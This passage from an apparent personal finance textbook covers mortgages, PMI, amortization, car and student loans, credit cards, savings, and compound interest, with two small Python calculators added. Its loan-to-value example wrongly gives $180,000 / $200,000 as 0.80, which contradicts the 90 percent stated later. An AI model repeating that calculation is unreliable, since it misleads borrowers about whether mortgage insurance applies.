Closing costs include title search, title insurance, recording fees, 
broker/agent commissions, application fees, appraisal fees, termite 
inspection fees, and home warranties. 


Interest 


You pay interest on the mortgage loan. Charging interest is how 
banks make their money. Interest rates available for home loans 
can vary widely, and sometimes offerings seem to change daily. 


In two popular loans, the 30-year fixed interest loan and the 15-year 
fixed interest loan, the interest rate is steady over the life of the 
loan (30 years and 15 years, respectively). A fixed-rate mortgage 
(FRM) is a “plain vanilla” mortgage, which is a pretty good idea. 


An adjustable rate mortgage (ARM) — also called a variable-rate 
mortgage — is another option. This type of mortgage has an 
interest rate that can float, or change, going up when interest rates 
go up and going down when they fall. ARMs are usually tied to 
(indexed to) an index, such as the London Interbank Offered Rate 
(LIBOR) that reflects the cost of the lender’s borrowing the money 
to lend you. ARM interest rates are usually lower than fixed rate 
mortgage interest rates, which is one of the things that make them 
seem attractive, but remember, they can adjust, and what comes 
down can go up. 


Does a lower interest rate make a difference? You bet it does. The 
interest rate affects your monthly payment amount and the total 
you pay over the life of the loan. Table 10-1 compares four interest 
rates for a 30-year $180,000 loan. 


Table 10-1 Interest Rates for a $180,000 Loan

Interest Rate | Monthly Payment | Total Interest | Total Cost
3.0 percent | $758.89 | $93,200.40 | $273,200.40
3.5 percent | $808.28 | $110,980.80 | $290,980.80
4.0 percent | $859.35 | $129,366.00 | $309,366.00
4.5 percent | $912.03 | $148,330.80 | $328,330.80

Notice that each 0.5 percent increase in the interest rate sends
your monthly payment up by about $50.00. Notice that each 0.5 
percent increase sends the total cost of the loan up by about 
$18,000.00. 


For math for real life, don’t get hung up using formulas to determine
loan figures yourself. Instead, use an online mortgage loan calculator,
such as this one:
http://www.bankrate.com/calculators/mortgages/mortgage-calculator.aspx.


To reduce monthly payments and the total cost of the loan, either 
shop around for a good interest rate or pay points. A discount point 
is a form of pre-paid interest. Some call it a bribe for the bank. 
Others call it a gamble that the money you pay for points will save 
you interest charges in the long run. Commonly, purchasing points 
is called a buydown. 


Typically, each point you can buy reduces the interest rate by 1/8 
percent (0.125 percent), and a point typically costs 1 percent of 
the loan amount. In general, the bank may offer you a chance to 
buy two points, resulting in a 0.25 percent drop in the interest rate. 
Figure 10-6 shows a very simple buydown comparison. 


BUYDOWN COMPARISON
Rate | Monthly Payment | Total Interest | Total Cost
4.50% | $912.03 | $148,330.80 | $328,330.80
4.25% | $885.49 | $138,776.40 | $318,776.40
DIFFERENCE | $26.54 | $9,554.40 | $9,554.40

Figure 10-6: A buydown comparison.


With a $180,000 loan, buying down from 4.50 percent to 4.25 percent 
costs you $3,600 (2 percent of $180,000). Is it worth it? Given that 
it reduces the monthly payment by $26.54 and reduces the total 
interest by $9,554.40, it seems like a pretty good deal. 


A discount point isn’t the same thing as a loan origination point. 
That’s a scheme where you pay for some of the costs of the loan 
origination process. 


Taxes 


Property taxes are part of home ownership, and lenders aren’t 
exactly filled with trust that you'll pay. To ensure you pay taxes on 
your property (which is really the bank’s property until you pay 
your mortgage off), your loan payments may include an allowance 
for taxes. 
In California, where I live, we typically use 1.25 percent of the
purchase price as an estimate of annual property taxes. For a 
$200,000 home, calculate taxes as follows: 


tax = purchase price x 1.25 percent 
tax = $200,000 x 0.0125 
tax = $2,500.00 


Insurance 


Private mortgage insurance (PMI) is also known as lenders’ mortgage 
insurance. PMI insures against your defaulting on the loan. The 
bank gets the benefit, and you pay the premium. 


Here’s how PMI works: If you default and the bank repossesses, 
the bank may not be able to sell the foreclosed home for a lot of 
money. PMI helps pay the bank back for its loss. 


As I mention earlier, the bank isn’t especially trusting. It’s even less
trusting if you don’t have “skin in the game” — that is, if your down
payment is low. A mere 10 percent down payment means the
loan-to-value ratio (LTV) is 90 percent. That’s a relatively high number.
The LTV is important because it determines whether or not PMI
is required. If your LTV is 80 percent or less, you may be able to
forgo private mortgage insurance altogether.


Here’s how you calculate LTV. In this example, the cost of the 
home is $200,000 and the loan amount is $180,000 (which means 
you made a $20,000 down payment): 


LTV = (loan amount / purchase price) x 100

LTV = ($180,000 / $200,000) x 100

LTV = 0.80 x 100

LTV = 80 percent


Beware the low down payment! If you have an LTV of 90 or
95 percent, PMI may be as high as 1.15 percent of the loan amount
per year. The way to get a better (read, lower) LTV is to make a
higher down payment.


To see how much your annual PMI premium is, use this calculation: 


annual PMI premium = loan size x 1.15 percent 
annual PMI premium = loan size x 0.0115 
annual PMI premium = $180,000.00 x 0.0115 
annual PMI premium = $2,070.00 
In this example, the home costs $200,000, with a 10 percent down
payment of $20,000. The resulting LTV is 90 percent. The PMI
premium for the year is $2,070, or about $172.50 per month!


PITI: Putting it all together 


To see the approximate monthly bottom line of a mortgage payment, 
you add up the monthly principal, interest, taxes, and insurance. 


PITI = principal + interest + taxes + insurance 
PITI = $283.28 + $525.00 + $208.00 + $175.00 
PITI = $1,191.28 


This amount is an approximation, as it reflects only the first month 
in a 360-month loan. Over the course of the loan, the principal and 
interest vary slightly every month. See the next section for info 
about amortization. 


Amortization: Paying down the loan 


Amortization is the gradual paydown of a loan. The term comes 
from the Old French amortir — to reduce to the point of death. So 
you “kill off” your mortgage by paying it down. 


Each monthly payment pays a bit of principal and a bit of interest. 
As the balance of the loan goes down, you pay a little less interest 
and a little more principal each month. To see what’s happening, 
the lender gives you an amortization schedule. Figure 10-7 shows an 
amortization schedule for the last six months of a loan. 


Month/Year | Payment | Principal Paid | Interest Paid | Total Interest | Balance 
Feb 2042   | $983.88 | $963.23        | $20.65        | $154,144.88    | $4,867.56 
Mar 2042   | $983.88 | $966.64        | $17.24        | $154,162.12    | $3,900.92 
Apr 2042   | $983.88 | $970.06        | $13.82        | $154,175.94    | $2,930.86 
May 2042   | $983.88 | $973.50        | $10.38        | $154,186.32    | $1,957.36 
Jun 2042   | $983.88 | $976.95        | $6.93         | $154,193.25    | $980.41 
Jul 2042   | $983.88 | $980.41        | $3.47         | $154,196.72    | $0.00 

Figure 10-7: An amortization schedule. 


Notice that monthly payments are fixed, but the amount of 
principal paid rises a little each month and the amount of interest 
paid decreases a little each month. At the beginning of the 30-year 
period, interest was the biggest component of the monthly 
payment. 




How do you calculate amortization? Use an online calculator. 
Although you could do it by hand with the following formula for 
the payment (p), it’s not practical: 


p = P0 x r x (1 + r)^n / ((1 + r)^n - 1) 


In this formula, P0 is the initial principal, r is the monthly percentage 
rate (the annual percentage rate divided by 12), and n is the 
number of payments (typically 360 payments in 30 years). Too 
much math for my taste! 


Reducing how much interest you pay 


There are a few ways you can reduce the amount of interest you pay on your 
mortgage: Shorten the term from a 30-year fixed rate mortgage to a 15-year fixed 
mortgage, make one or more lump sum payments, or pay a little extra on principal 
each month: 


Shortening the term: If you have the income (and if the bank agrees), you may 
qualify for a shorter-term mortgage, such as a 15-year fixed. If you already have 
a 30-year fixed, you may be able to refinance to a 15-year fixed. 


With a 15-year fixed, you pay more per month, but you pay off the loan in 15 
years, saving yourself a bundle of interest in the process. Look at this comparison 
between a 30-year fixed and a 15-year fixed mortgage for a $200,000 loan. As you 
can see, you pay $524.55 more each month, but you save $77,451.36 in interest over 
the life of the loan. You also own your home sooner. Your best tool for mortgage 
comparisons is an online mortgage calculator. Visit 
http://www.bankrate.com/calculators/mortgages/mortgage-loan.asp. 


30 VS. 15 YEAR COMPARISON 


Term       | Rate  | Monthly Payment | Total Interest | Total Cost 
30 years   | 4.00% | $954.83         | $143,739.01    | $343,739.01 
15 years   | 4.00% | $1,479.38       | $66,287.65     | $266,287.65 
DIFFERENCE |       | -$524.55        | $77,451.36     | $77,451.36 


Making lump sum payments: Lump sum payments are the payment of a 
large amount of the principal at one time. Say, for example, you get a bonus 
each year and put your entire bonus toward the principal of your loan. Such 
payments typically don't shorten the term of the loan, but they do reduce the 
total interest paid. 


Paying a little extra: Pay a bit extra on principal each month. Increasing each 
monthly payment by a few hundred dollars (maybe just $100.00) helps bring the 
balance down more quickly, and that reduces the total interest paid. 
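
The payment formula given earlier and the options in this sidebar can be checked with a short script. This is an added example, not part of the original book: the function names are illustrative, the $200,000 loan at 4.00 percent comes from the comparison table above, and the $100.00 extra payment comes from the last item.

```python
"""Added example: fixed-rate amortization with the payment formula
p = P0 * r * (1 + r)^n / ((1 + r)^n - 1).

Assumed inputs: the $200,000 loan at 4.00% APR from the 30 vs. 15 year
comparison, and a $100 extra monthly principal payment.
"""


def monthly_payment(principal, annual_rate, n_payments):
    """Level monthly payment; r is the annual rate divided by 12."""
    r = annual_rate / 12
    if r == 0:  # interest-free edge case: the formula would divide by zero
        return principal / n_payments
    growth = (1 + r) ** n_payments
    return principal * r * growth / (growth - 1)


def schedule(principal, annual_rate, n_payments, extra=0.0):
    """Yield (month, interest, principal_paid, balance) until the loan is paid.

    `extra` is an additional amount paid toward principal every month.
    """
    r = annual_rate / 12
    payment = monthly_payment(principal, annual_rate, n_payments) + extra
    balance = principal
    month = 0
    while balance > 0.005:  # stop once less than half a cent remains
        month += 1
        interest = balance * r
        # The final payment may be smaller than the regular one.
        principal_paid = min(payment - interest, balance)
        balance -= principal_paid
        yield month, interest, principal_paid, balance


def summarize(principal, annual_rate, n_payments, extra=0.0):
    """Payment, number of months, and total interest for one loan setup."""
    rows = list(schedule(principal, annual_rate, n_payments, extra))
    return {
        "payment": monthly_payment(principal, annual_rate, n_payments) + extra,
        "months": len(rows),
        "total_interest": sum(row[1] for row in rows),
    }


if __name__ == "__main__":
    loan, apr = 200_000, 0.04
    for label, n, extra in [
        ("30 years", 360, 0.0),
        ("15 years", 180, 0.0),
        ("30 years + $100/month", 360, 100.0),
    ]:
        s = summarize(loan, apr, n, extra)
        print(
            f"{label:<22} payment ${s['payment']:>9,.2f}  "
            f"months {s['months']:>3}  "
            f"interest ${s['total_interest']:>11,.2f}"
        )

    # First and last rows of the 30-year schedule: interest dominates at the
    # start, principal at the end.
    rows = list(schedule(loan, apr, 360))
    for month, interest, principal_paid, balance in (rows[0], rows[-1]):
        print(
            f"month {month:>3}: interest ${interest:,.2f}, "
            f"principal ${principal_paid:,.2f}, balance ${balance:,.2f}"
        )
```

The first two lines of output match the comparison table, and the third shows the extra $100.00 retiring the 30-year loan in 301 payments instead of 360.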




A second mortgage or home 
equity line of credit 


A second mortgage or second deed of trust is a second loan secured 
by your home. Second mortgages are subordinate to first mortgages. 
If you default on your second mortgage, the first mortgage gets 
paid off first. 


You can also call a second mortgage a home equity loan. You would 
most likely “take out a second” to finance major expenses, such as 
college or big home improvements. Such a loan is typically a 
fixed-term loan. 


In the United States, another form of home equity loan, the home 
equity line of credit (HELOC), is common. It’s a useful, but somewhat 
risky, way to “pull money” out of your home. It’s a revolving 
line of credit, so you can think of it as a variable-term loan. That 
means “it never ends.” (I explain revolving credit in the section 
“Understanding how credit cards work.”) 


With a HELOC, you borrow only sums you need, up to a credit 
limit. The risk is that you will use the money to fund your lifestyle, 
not to meet major expenses. Should home prices go down, you 
may find that you’re “under water.” That is, what you owe on your 
house is greater than its value. 


Using Smart Math for 
Other Big Purchases 


Your home loan (or “first”) is a biggie. So is a second mortgage 
or home equity line of credit. But they aren’t the only kinds of 
useful loans. Two other common loans that typically involve large 
amounts are car loans and education loans. 


Cruising around car loan math 


An automobile loan is possibly the second biggest loan you have. 
With cars costing thousands of dollars (some as high as $32,000 to 
$60,000 or more), very few people have the ability to pay cash. 


The total cost of a car loan is easy to see: 


total cost of loan = agreed-upon price - trade-in - down 
payment + tax + interest 


The loan will be amortized over 36 to 72 months. In the “old days,” 
36 months was standard, but as cars got more expensive, the 
terms of auto loans increased to make the cars appear more 
affordable. 


When you know the basics of the loan you want (total price, term, 
and interest rate), use an online car payment calculator to figure 
your monthly payments. For example, you could visit 
http://www.bankrate.com/calculators/auto/auto-loan-calculator.aspx. 


Here are some things to keep in mind about auto loans: 


If you find a dealer who advertises “We approve everyone,” 
you will probably be getting into a pretty bad loan. 
Dealers who lend to higher-risk purchasers are willing to 
assume the risk of likely defaults because they make up the 
cost by charging high interest rates. In other words, the cost 
of the bad loans is paid by everyone else’s loan. 


A credit union is the best place to get a car loan. 


If you can, sell your old car privately. You can get a better 
price than any dealer will give you on trade-in. Then you'll be 
able to put a larger down payment on the new car. 


If possible, buy a car directly from the owner rather than 
a dealer. Chances are, you'll be able to get a better deal 
because private sellers don’t charge commissions and don’t 
have to run a dealership at a profit. Although a private seller 
obviously wants to get a good price for the car, he or she also 
may be motivated by nonfinancial considerations, such as 
just getting rid of the vehicle to make room in the garage. In 
addition, because you have to save up the money for a private 
purchase, you may be able to avoid a loan altogether and will 
own the car the moment you buy it. 


Learn all the fees before you buy from a dealer. Expect 
to pay vehicle registration fees (since your car has to have 
license plates) and sales tax. Some places want to tax the full 
purchase price of the new car and ignore the cash value of 
trade-in. 


Be wary of dealers who tax the full purchase price of the 
car and ignore the value of rebates (a practice many states 
permit), documentation (“doc”) fees, and add in any fees 
labeled “dealer prep” or “shipping and handling.” These last 
two fees are bogus fees. 


Studying up on education loans 


Some loans — specifically those that let you purchase things that 
end up worth more than the loan costs — are good investments. In 
that way, a student loan can be a great investment. These loans are 
great financial tools, designed to help students pay for college costs, 
such as tuition, books, and living expenses. In addition, student 
loans are relatively easy to get, the loan rates are usually much 
lower than other types of loans, and payback usually doesn’t begin 
until the student’s education has ended — and some students can 
even get their loans forgiven if they go into certain fields or agree 
to work in certain areas of need for a few years after graduation. 


But you need to be careful with these loans to ensure that you 
don’t end up owing more than you can afford to pay back. The loan 
of choice is a federal direct subsidized loan for undergraduate 
students. It’s a fixed-rate loan with a current rate of 3.4 percent. 
You might also get a loan from a bank. One major bank currently 
offers fixed-rate loans for “as low as” 6.17 percent. 


The mechanics of a student loan are about the same as for other 
types of loans. You borrow the money, and then you have to pay 
it back. To get a snapshot of payoff period and interest paid, visit 
http://cgi.money.cnn.com/tools/studentloan/studentloan.html. 
You'll see, for example, that a $60,000 loan at 6.17 percent with 
$600 monthly payments will take 11 years and 9 months to pay off. 
You’ll pay $24,457 in interest, too. 


Calculating How to Avoid or Get 
Out of a Credit Card Hole 


Decades ago, credit purchases were a novel way of making consumer 
loans. A family might have an account at the grocer’s or general 
store. In the heyday of the great department stores, the store 
might issue a charge-a-plate, a small metal card that allowed 
on-account purchases at that store. Today, bank cards (notably 
Visa and MasterCard) are accepted practically everywhere. 


Credit cards can be a great blessing or a great curse, depending on 
how you use them. In the following sections, I tell you how to avoid 
the trouble many credit card users get themselves into. 


Understanding how 
credit cards work 


A credit card is revolving credit. You have a credit limit, and you 
can borrow up to the limit. As you pay down your balance, you can 
borrow more. This sounds like a good deal — and it can be, as long 
as you pay off your balance each month. Otherwise, you must pay 
interest and may never pay off your balance. To see what happens 
when you don’t pay off your balance, jump to the upcoming section 
“Paying down credit cards.” 


In addition, because the loan is unsecured, it usually has a relatively 
high interest rate, ranging from, say, 10 percent to as high as 
33 percent. These high rates allow banks to make a lot of money, 
while offering you convenience in exchange. 


When you use your card, the merchant pays a swipe fee for 
accepting it. You pay for this through higher prices. 


Avoiding annual and other fees 


Way back in the Stone Age, credit card lenders charged you an 
annual fee, typically $20.00, for the privilege of using their cards. 
Then annual fees went away for a long time. However, because of 
government activity (investigating and lowering swipe fees, for 
example), banks feel that they are hurting for money and may 
re-institute annual fees. 


Other fees include inactivity fees (you have a card that you never 
use), application fees, cash advance fees, balance transfer fees, 
late fees, over-limit fees, return check fees, and foreign transaction 
fees. 


A merchant may try to charge you a checkout fee (a surcharge) 
for using a credit card. Checkout fees are prohibited by law in 
ten states. 


Your goal is to avoid, if possible, using any credit card that charges 
an annual fee. You can avoid most of the other fees, too. 


Rewards, points, and folderol 


Credit card lenders generally aren't too competitive over interest rates. A vast 
number of cards charge between 18 percent and 21 percent. To appear competitive, 
many banks offer what they call “rewards,” “points,” “loyalty points,” or “travel 
points” as an incentive for you to use their cards. You can redeem those points for 
merchandise, travel, or in some cases cash. Here’s a typical point setup: The Chase 
Amazon Visa, which I use, gives you 1 point (worth $0.01) to spend on Amazon when 
you charge $1.00 anywhere. The points accumulate all the time, and you can spend 
any number of them at any time. 


There are two schools of thought about points. Some people swear by them, 
insisting that they give you something for nothing. Other people avoid them, 
believing that points muddy the water. 


If you're in the “swear-by-them” crowd, make sure you use the points you accrue 
for things you actually need or will use. 


Paying down credit cards 


To enjoy the convenience of credit cards while avoiding the troubles, 
you have to use your credit cards wisely. Monthly interest accrues 
at 1/12 the annual percentage rate (APR). If, for example, the APR 
is 18 percent, then the monthly rate is 1.5 percent. 


To figure your monthly balance, the bank takes your old balance, 
adds new charges, adds interest, subtracts payments, and shows 
you your new balance: 


new balance = old balance + new charges + interest - payments 


It’s interesting to see how your balance grows when you make 
partial payments rather than paying the card off each month. 
Figure 10-8 shows seven months of credit card numbers with an 18 
percent APR. 


The lesson here is that if you charge $100.00 but make payments of 
just $50.00, eventually your ending balance will grow, not decline. If 
you have a big limit on your balance (for example, $16,000.00), the 
interest charges can get very dramatic as your balance approaches 
your limit (for example, $240.00 per month at the maximum 
balance for an 18 percent APR card). 


Starting Balance | New Charges | Monthly Interest | Payment | Ending Balance 
$0.00            | $100.00     | $1.50            | -$50.00 | $51.50 
$51.50           | $100.00     | $2.27            | -$50.00 | $103.77 
$103.77          | $100.00     | $3.06            | -$50.00 | $156.83 
$156.83          | $100.00     | $3.85            | -$50.00 | $210.68 
$210.68          | $100.00     | $4.66            | -$50.00 | $265.34 
$265.34          | $100.00     | $5.48            | -$50.00 | $320.82 
$320.82          | $100.00     | $6.31            | -$50.00 | $377.13 

Figure 10-8: Looking at the increasing credit card balance. 
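
The balance formula and Figure 10-8 can be reproduced with a few lines of Python. This is an added example, not from the original book: the function names are illustrative, and it assumes interest is charged on the starting balance plus the month's new charges and rounded to the cent, which is the convention that matches the figure's numbers.

```python
"""Added example: new balance = old balance + new charges + interest - payments.

Decimal is used so that every amount is exact to the cent.
"""
from decimal import Decimal, ROUND_HALF_UP

CENT = Decimal("0.01")


def monthly_interest(balance, apr):
    """Interest for one month at 1/12 of the APR, rounded to the cent."""
    return (balance * apr / 12).quantize(CENT, rounding=ROUND_HALF_UP)


def simulate(months, charges, payment, apr, start=Decimal("0.00")):
    """Return one row per month:
    (starting balance, new charges, interest, payment, ending balance).

    Assumption: interest is charged on starting balance plus new charges.
    """
    rows, balance = [], start
    for _ in range(months):
        interest = monthly_interest(balance + charges, apr)
        ending = balance + charges + interest - payment
        rows.append((balance, charges, interest, payment, ending))
        balance = ending
    return rows


def months_to_pay_off(balance, payment, apr, limit=1200):
    """Pay a fixed amount each month with no new charges.

    Returns (months, total interest paid), or None when the payment does not
    exceed the monthly interest, in which case the balance never shrinks.
    """
    total_interest = Decimal("0.00")
    for month in range(1, limit + 1):
        interest = monthly_interest(balance, apr)
        if payment <= interest:
            return None
        total_interest += interest
        owed = balance + interest
        balance = owed - min(payment, owed)  # last payment may be smaller
        if balance == 0:
            return month, total_interest
    return None


if __name__ == "__main__":
    apr = Decimal("0.18")

    # Figure 10-8: charge $100.00 and pay $50.00 every month for seven months.
    for row in simulate(7, Decimal("100.00"), Decimal("50.00"), apr):
        print("  ".join(f"${amount:>8}" for amount in row))

    # Stop charging and keep paying $50.00 on the $377.13 balance.
    print(months_to_pay_off(Decimal("377.13"), Decimal("50.00"), apr))

    # At a $16,000.00 balance, a $240.00 payment only covers the interest.
    print(months_to_pay_off(Decimal("16000.00"), Decimal("240.00"), apr))
```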


Rule of thumb: Try never to charge anything that’s consumed 
before it’s paid for. That includes fancy dinners and movie tickets. 
After the thrill is gone, the payments linger on. The best thing you 
can do with a credit card — and admittedly it isn’t easy — is to pay 
it off promptly. 


Selecting Savings Accounts 




Savings is a great tradition. The people in some countries save 
a relatively high percentage of their incomes. The United States 
hasn’t usually been known as a nation of savers, but things are 
changing. Here are some of the savings options and the amount of 
interest each typically earns: 


Regular savings account: This is a “no strings” savings 
account. You “own” the money and can withdraw it all at any 
time. The disadvantage of a regular savings account is that 
interest rates are very, very low, as little as 0.01 percent. 


A regular savings account is sometimes called a passbook 
savings account because of the little book (the passbook) 
people used to carry to the bank. The teller wrote in the 
amounts of deposits and withdrawals in the book. 


Certificates of deposit: A certificate of deposit (CD) has a fixed 
term, such as 1 year, 2 years, 5 years, or 10 years. It pays 
better interest than passbook savings, and even better rates 
are available if you buy a jumbo CD, typically for an amount 
greater than $100,000.00. The drawback is that you’re not 
expected to make any withdrawals. If you do, “severe penalties 
may apply.” Your “math job” with certificates of deposit is 
simply to compare interest rates. The bank will do the rest for 
you. To compare rates, visit http://www.bankrate.com/. 
Typical rates are about 0.25 percent to 0.50 percent. A jumbo 
CD might yield 1.25 percent. 


College savings accounts: An education savings plan (a 529 
plan) is designed to help families set aside money for college 
costs. It has tax advantages, because, although your deposits 
aren’t tax-deferred, the money that grows in the account is 
free from federal (and sometimes state) taxation. 


Medical savings accounts: A health savings account (HSA) 
works “in partnership” with a high-deductible health insurance 
plan at your job. With a health savings account, you 
put aside money for medical expenses. The tax advantages 
include 1) not being taxed on money you put in, and 2) not 
being taxed on money you spend on qualified expenses. There 
are various limits and other strings attached. 


Chapter 11 


Key Principles of 
Investment Math 


In This Chapter 


Determining your tolerance for risk 
Looking at retirement plans and pensions 
Investigating math related to stocks, bonds, and mutual funds 


You are an investor. Maybe you're not as big as a giant pension 
fund or a Wall Street bank, but just the same, you’re an 
investor. When you invest, you put money into something with the 
expectation of gain. The idea is that investments “grow money” 
until you need it. Food and clothing, while important, aren’t 
investments. Savings accounts (covered in Chapter 10), stocks, 
bonds, and mutual funds are. 


In this chapter, I make investment math as easy as possible for 
you. I explain the basic investment math, the vocabulary, and the 
tools (which include basic math skills, online calculators, and your 
fine mind) that can help you handle your everyday investment 
concerns. 


Factoring Personal Info into 
Investment Decisions 


No matter how much or how little money you have to invest, you 
need to know a little about yourself before you make any investment 
decisions, including how much to invest and what to invest in. 


Knowing your tolerance for risk 


Risk tolerance is your assessment of how much risk you’re willing to 
take with investments. You’ve heard the adage, “There’s no such 
thing as a free lunch.” That’s true of investments. An investment 
with a possibility of a higher payoff is likely to be riskier than one 
with a lower (but more reliable) return. 


For example, if you put $100 in the bank at 1 percent interest and 
leave it there for a year, you know for certain that you will have 
$101 one year later. That’s low-risk: You don’t assume much risk, 
and your investment doesn’t generate a big return. On the other 
hand, if you bet $100 on the flip of a coin, you have a 50 percent 
probability that you'll double your money ($200) and a 50 percent 
probability that you’ll lose it all ($0.00). That’s high-risk. Both 
the risk and the potential return are high. 


Risk tolerance is mainly psychological. You need to determine 
whether you’re risk-averse, risk-neutral, or risk-loving. If you 
deal with a broker, he or she will ask about your tolerance. Even 
without a broker, you can take risk tolerance surveys online. Visit 
http://www.paragonwealth.com/risk_tolerance.php. 


Conventional wisdom (and it’s pretty good) links risk tolerance to 
your age. If you’re younger, the thinking goes, you can afford more 
risk because you have time to make up for losses and you may see 
some good gains. If you’re older, however, you typically need to 
be wary of risk to reduce the chance that your “sunset years” will 
become your nightmare years. 


Looking at your investment horizon 


Your investment horizon is the time in which you expect to buy and 
hold investments. This horizon is usually based on age. For example, 
if you’re 60 years old and want to retire at 65, your investment 
horizon is about 5 years. If you’re 25 years old, you’ve got a long 
time to save and invest. Your investment horizon is about 40 years. 


Usually, those with longer investment horizons can concentrate 
on higher-risk investments, such as common stocks (or common 
stock mutual funds). Those with shorter investment horizons may 
be better off with fixed-income securities, such as bonds (or bond 
funds). 


Choosing between appreciation 
or income 


Based on your risk tolerance and your investment horizon, you are 
likely to pursue one of two broad categories of investments: those 
that grow in value (appreciate) and those that produce income. 


Investments that appreciate: Appreciation is an increase in 
the value of assets, including cash in savings and your home 
(you hope). When stocks appreciate, their price goes up, 
making them more valuable. 


Investments that generate income: Income from an investment, 
generally speaking, comes in the form of regular payments 
of interest or dividends. Income from investments is taxed 
as ordinary income, but that doesn’t mean you spend it like 
ordinary income. Generally, you pay the taxes and plow the 
remainder into more investments. 


A mix of investments: At different points in your life, you may 
be advised to consider a mix of investments. When you’re 
younger, you may have more aggressive growth investments 
and fewer income investments. As you grow older, you may 
shift to more conservative growth investments, bonds, and 
perhaps tax-free bonds. 


Playing with Instruments: 
Not the Musical Kind 


A financial instrument (sometimes called a vehicle) is an asset you 
can trade, and you'll be exposed to many of them over your lifetime. 
You can also call these assets investment products. 


Basic financial instruments 


Here’s a brief tour of basic instruments: 


Savings-based instruments: These include savings accounts, 
certificates of deposit (CDs), treasury bills, treasury notes, 
and treasury bonds. They’re considered savings-based 
instruments because you put money in and just let it grow. 
No buying or selling is involved. A savings account “goes on 
forever,” and when a CD matures, you typically just renew it. 


Investment-based instruments: These include common 
stocks, preferred stocks, options, commodities, corporate 
bonds, and municipal bonds. These instruments require more 
involvement than savings-based instruments. The idea is to 
buy and sell them in a way that minimizes your losses and 
maximizes your gains. (By the way, a mutual fund is a collection 
of individual investment items. See the section “Managing 
Mutual Funds” for details on that investment vehicle.) 


Real-estate-based instruments: These include your home, 
a vacation home, a rental property, real estate investment 
trusts, or a whole apartment building (if you happen to own 
one). Even “raw” land is a real estate investment. 


Other instruments: This category includes just about 
anything — including gold, silver, and platinum — that 
doesn’t fall into the other categories. Collectibles, such as art, 
stamps, coins, books, and a collection of Model T Fords, are 
instruments, too, in that they can increase in value and be 
traded for money, but the process of selling them can be slow. 
They’re not very “liquid,” as the saying goes. 


Insurance-based instruments: Some forms of insurance have 
an investment component. Many types of insurance offer only 
protection (think term life insurance or automobile insurance), 
but some insurances, such as whole life insurance and 
annuities, also have an investment component. I explain these 
in more detail in Chapter 12. 


Climbing the investment pyramid 


When you invest, pay a good deal of attention to conventional 
wisdom, which generally tends to be sound. Here’s one example 
of conventional wisdom at work: Begin with the most reliable 
investments possible and, over time, add more speculative, risky 
investments. 


Such a plan takes the shape of a pyramid. Figure 11-1 shows a 
typical investment pyramid. 


If you follow a pyramid like the one in Figure 11-1, you can hold 
cash in some very reliable vehicles, such as a savings account 
and certificates of deposit. Even some insurance has conservative 
investment components that can return cash to you. After 
cash, your investments become riskier, but the payoffs are better. 
Mutual funds are pretty reliable, and so are bonds. 


Figure 11-1: An investment pyramid. 


A pyramid scheme is something entirely different from the investment 
pyramid. It’s a fraudulent investment that you want to stay away 
from. 


Doing a little at a time over time 


How do you eat an elephant? One bite at a time. It’s the same with 
investments. You don’t need to save or invest a lot. Just put away 
something. Try $10 per week. A little money will grow a lot if you 
give it enough time. So the younger you are when you start, the 
better off you'll be when you’re older. You can retire with a big pile 
of money if you work this right. 


For example, if you put just $10 per week into a savings account 
paying 1.0 percent per year, at the end of the year (52 weeks later) 
you have $520 from your deposits and $3.04 in interest! (This 
example assumes monthly compounding, although banks may 
compound more frequently, but it shows how interest impacts 
your balance in a good way.) 


It’s crazy to think that you don’t have to save a thing until you’re 
about 60, and then you can build up your assets for retirement at 
age 65. Start early, even if you can only afford a little bit at a time. 


Figuring in inflation 


Conventional wisdom says that your investments have got to “beat 
inflation.” That is, they have to earn at least as much as the rate of 
inflation. Inflation is the gradual increase in prices over time. 


The current rate of inflation in the United States is 1.7 percent, 
which means that $1.00 this year basically buys 1.7 percent less 
than it did last year. Therefore, try to put your money in instruments 
that earn at least 2 percent. 


Avoiding foolish decisions 


As the saying goes, “A fool and his money are soon parted.” Keep 
the following points in mind: 


Gambling (in casinos, at the racetrack, or playing Lotto) is not 
the road to financial success. Almost every form of gambling 
has a “house edge,” which means you will lose money. Lotto is 
one of the biggest losers (see Chapter 9 for more). 


“Get rich quick” schemes won’t make you rich. At best, they’ll 
make someone else rich, with your money. 


If something is “too good to be true,” it’s probably not true. 
Beware of pitches that claim overnight doubling of your 
money, such as email solicitations from companies pushing 
penny stocks (those with a selling price of $0.01 or $0.02 per 
share). 


Growing the Green Stuff: 
The Time Value of Money 


Principal is the money you invest. Interest is the money that the 
principal earns. A savings account deposit, for example, is probably 
the simplest investment there is, and the bank pays you interest 
on your savings because it lends your money to others at a higher 
interest rate. 


The time value of money is the value money, earning a certain 
amount of interest, grows to over a particular period of time. Over 
time, money that earns interest grows substantially. To see the 
way the time value of money works, take a look at simple interest 
compared to compound interest. 


Calculating simple interest 


Simple interest is calculated only on the principal invested. Say that 
your Aunt Tillie gave you $100 on your tenth birthday. Because 
your mother wouldn’t let you spend it on frivolous things and 
told you to save it for a rainy day, you put it in a bank that pays 
5 percent interest annually. 


Here’s how you calculate interest on $100 principal (p) at an 
interest rate (r) of 5 percent per year. 


interest = principal x rate 
i=p(r) 
i = $100.00(0.05) 
i = $5.00 


So, after 1 year, your $100 has earned $5. Every year, simple 
interest is the same. At the end of 50 years, your $100 will have earned 
$250 ($5 x 50) in interest. 


By contrast, it’s the world of compound interest where things 
get hot. 


Calculating compound interest 


Compound interest is calculated on the principal and interest 
accrued. Basically, you add the amount you made in interest to 
the principal. Then you let another period (usually 1 year) go by. 
You earn interest on the total. Then you do it again and again and 
again. With compound interest, from the end of year 1 to the day 
you withdraw, the total value of the investment climbs. 


Given the same scenario as that used in the preceding section — your 
generous Aunt Tillie gives you $100 that your mother insists you 
save — you decide to put it in a bank that pays 5 percent interest 
compounded annually. Now say that 50 years have passed. How 
much money do you have in that old account now? 


Figure 11-2 shows an example of the time value of money. Notice 
that at the end of year 15, your $100 has more than doubled to 
$207.89. At the end of year 50, your $100 is now $1,146.74 — a 1,000 
percent increase! That’s the power of interest. 


[Chart: bank balance, $0.00 to $1,400.00, by year] 

Figure 11-2: The time value of $100 held for 50 years. 


Albert Einstein said, “Compound interest is the eighth wonder of 
the world. He who understands it, earns it . . . he who doesn’t . . . 
pays it.” 


Calculating future value 


Future value is what your investment will be worth some time in 
the future; present value is what it’s worth now. Using the Aunt 
Tillie example, in which the starting amount is $100, the interest 
rate is 5 percent, and the number of periods is 50 years, you 
can calculate future value with this formula. Here FV is the final 
amount, PV is the starting amount, i is the interest rate, and n is 
the number of periods: 


future value = present value x (1.00 + rate)^(number of periods) 
